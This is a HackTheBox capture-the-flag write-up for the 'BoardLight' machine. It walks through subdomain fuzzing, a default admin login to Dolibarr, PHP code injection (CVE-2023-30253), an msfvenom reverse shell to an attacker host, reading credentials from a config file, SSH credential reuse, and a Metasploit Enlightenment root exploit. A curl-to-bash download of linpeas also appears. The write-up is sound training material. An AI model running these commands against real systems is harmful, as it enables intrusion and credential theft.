HTB: boardlight Writeup

#htb #writeup #linux #dolibarr #cve-2023-30253 #nmap #ffuf #php-code-injection

Machine Banner

Machine Information

AttributeDetails
NameBoardLight
OSLinux
DifficultyEasy
Points20
Release Date2023
IP Address10.10.11.206
Authorjoshuastrike

Machine Rating

⭐⭐⭐⭐☆ (7.5/10)

Difficulty Assessment:

  • Enumeration: ⭐⭐⭐☆☆
  • Real-world: ⭐⭐⭐⭐☆
  • CVE: ⭐⭐⭐☆☆
  • CTF-like: ⭐⭐⭐☆☆

Summary

BoardLight is an Easy-difficulty Linux machine running Dolibarr ERP/CRM 17.0.0. The attack leverages CVE-2023-30253, an authenticated PHP code injection vulnerability in Dolibarr, combined with credential reuse and Enlightenment SUID binary exploitation for privilege escalation.

TL;DR: Subdomain enumeration → Dolibarr discovery → Default credentials → PHP code injection → Reverse shell → Credential reuse → SSH access → Enlightenment exploit → Root.

Reconnaissance

Port Scanning

Terminal window
nmap -sC -sV -T4 -p- 10.10.11.206

Results:

22/tcp  open  ssh      OpenSSH 8.2p1 Ubuntu
80/tcp  open  http     Apache httpd 2.4.41

Subdomain Enumeration

Add the machine to /etc/hosts:

Terminal window
echo "10.10.11.206 board.htb boardlight.htb" >> /etc/hosts

Use ffuf to discover subdomains (filtering by response size to exclude non-existent subdomains):

Terminal window
ffuf -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -u "http://board.htb" -H "Host: FUZZ.board.htb" -fs 187

Results:

crm                     [Status: 200, Size: 6990, Words: 2001, Lines: 109]

Service Enumeration

Discovered: crm.board.htb runs Dolibarr ERP/CRM 17.0.0

Terminal window
echo "10.10.11.206 crm.board.htb" >> /etc/hosts
curl http://crm.board.htb

Vulnerability Assessment

Identified Vulnerabilities:

  • CVE-2023-30253 — Dolibarr 17.0.0 Authenticated PHP Code Injection vulnerability in website module.
  • Enlightenment SUID Privilege Escalation — Local privilege escalation via Enlightenment binary.

Initial Foothold

Step 1: Access Dolibarr with Default Credentials

Navigate to http://crm.board.htb and log in with default credentials:

Username: admin
Password: admin

This grants access to the Dolibarr administration panel.

Step 2: Exploit CVE-2023-30253 PHP Code Injection

Dolibarr 17.0.0 allows authenticated users to inject PHP code when creating website pages. Navigate to:

Websites > Pages

Create a new page and inject PHP code in the content field:

<?PHP echo system("whoami"); ?>

Step 3: Generate and Deliver Reverse Shell

Use msfvenom to create a PHP reverse shell payload:

Terminal window
msfvenom -p php/reverse_php LHOST=10.10.14.x LPORT=4444 -f raw > shell.php

Inject the payload into a Dolibarr website page. Set up a listener:

Terminal window
nc -nlvp 4444

Execute the payload through the web interface to obtain a reverse shell as www-data.

Step 4: Extract Database Credentials

Once inside the shell, locate and read the Dolibarr configuration file:

Terminal window
cat /var/www/html/crm.board.htb/htdocs/conf/conf.php

Discovered Credentials:

Database User: dolibarrowner
Database Password: serverfun2$2023!!

User Compromise

Credential Discovery and Reuse

The database credentials discovered earlier (serverfun2$2023!!) are reused by the system user larissa. Attempt SSH access:

Terminal window
ssh larissa@board.htb

Password: serverfun2$2023!!

This grants authenticated SSH access as the larissa user.

User Flag

Once logged in via SSH:

Terminal window
cat ~/user.txt

🚩 User Flag: [Flag captured from /home/larissa/user.txt]

Privilege Escalation

Enumeration

Run standard enumeration commands to identify potential privilege escalation vectors:

Terminal window
sudo -l
find / -perm -4000 -type f 2>/dev/null
ps aux | grep -E "python|java|node|php|ruby"

Use automated tools like linpeas.sh to identify exploitable conditions:

Terminal window
curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | bash

Key Findings:

  • Enlightenment SUID binary present
  • Sudo version: 1.8.31
  • Kernel: Linux 5.x (potentially vulnerable to DirtyPipe - CVE-2022-0847)

Exploitation (Root/Administrator)

Use Metasploit to exploit the Enlightenment SUID binary vulnerability:

Terminal window
msfconsole
search enlightenment
use exploit/linux/local/ubuntu_enlightenment_mount_priv_esc
set LHOST 10.10.14.x
set LPORT 5555
set SESSION [session_id]
run

Alternatively, download and execute the standalone exploit. This grants root-level access.

Root Flag

Once root access is obtained:

Terminal window
cat /root/root.txt

🚩 Root Flag: [Flag captured from /root/root.txt]

Attack Chain Summary

graph TD
    A["Nmap Scan<br/>Discover ports 22, 80"] --> B["Subdomain Enumeration<br/>ffuf discovers crm.board.htb"]
    B --> C["Dolibarr 17.0.0 Identified<br/>Running on crm.board.htb"]
    C --> D["Default Credentials<br/>admin:admin"]
    D --> E["CVE-2023-30253 Exploitation<br/>PHP Code Injection in Pages"]
    E --> F["Reverse Shell<br/>www-data Access"]
    F --> G["Config File Extraction<br/>Database Credentials Found"]
    G --> H["Credential Reuse<br/>larissa:serverfun2$2023!!"]
    H --> I["SSH Access<br/>larissa User Shell"]
    I --> J["Enlightenment Exploit<br/>SUID Binary Vulnerability"]
    J --> K["Root Access<br/>ubuntu_enlightenment_mount_priv_esc"]

Tools Used

ToolPurpose
nmapPort scanning and service fingerprinting
ffufSubdomain enumeration and web fuzzing
feroxbusterDirectory brute-forcing
msfvenomReverse shell payload generation
msfconsoleMetasploit exploitation framework
mysqlDatabase interaction and credential verification
linpeas.shAutomated privilege escalation enumeration
searchsploitLocal exploit searching
sshSecure shell access and authentication
ncReverse shell listener setup
curlWeb requests and configuration retrieval
python3Scripting and exploit execution
gobusterAlternative directory enumeration

Vulnerability Reference

#VulnerabilityComponentSeverityImpact
1CVE-2023-30253Dolibarr 17.0.0HighAuthenticated PHP Code Injection in website module
2Default CredentialsDolibarr ApplicationHighUnrestricted admin access with admin:admin
3Credential ReuseSystem ConfigurationHighDatabase password reused for SSH user
4Enlightenment SUID ExploitLinux BinaryHighLocal privilege escalation to root
5CVE-2022-0847 (DirtyPipe)Linux KernelCriticalAlternative kernel-level privilege escalation

Key Learnings

  • Subdomain enumeration is essential: Virtual hosts and subdomains often host different applications with their own vulnerabilities (Dolibarr was on crm.board.htb, not the main domain).
  • Default credentials remain a critical risk: Many enterprise applications ship with default credentials that are never changed in development/staging environments.
  • Credential reuse is a common security failure: Database passwords being reused for system user accounts enables lateral movement from web application to system access.
  • Configuration files are gold mines: Application config files (/conf/conf.php, .env files, etc.) often contain sensitive credentials that should never be readable by web processes.
  • SUID binaries can escalate privileges: Lesser-known SUID binaries (like Enlightenment) can be exploited for privilege escalation; automated tools like linpeas help identify these.
  • Defense in depth matters: Even with compromised web services, proper privilege separation and credential isolation could have prevented full system compromise.

Author

joshuastrike (Original Machine Creator)

Disclaimer

This writeup is for educational purposes only. All activities described were performed in a controlled, legal environment (HackTheBox platform). Unauthorized access to computer systems is illegal. This writeup documents the intended attack chain and vulnerabilities present in the BoardLight machine.

Last Updated: 08 Mar 2026

Tags: #HackTheBox #Linux #Easy #Dolibarr #CVE-2023-30253 #PHP-CodeInjection #CredentialReuse #Enlightenment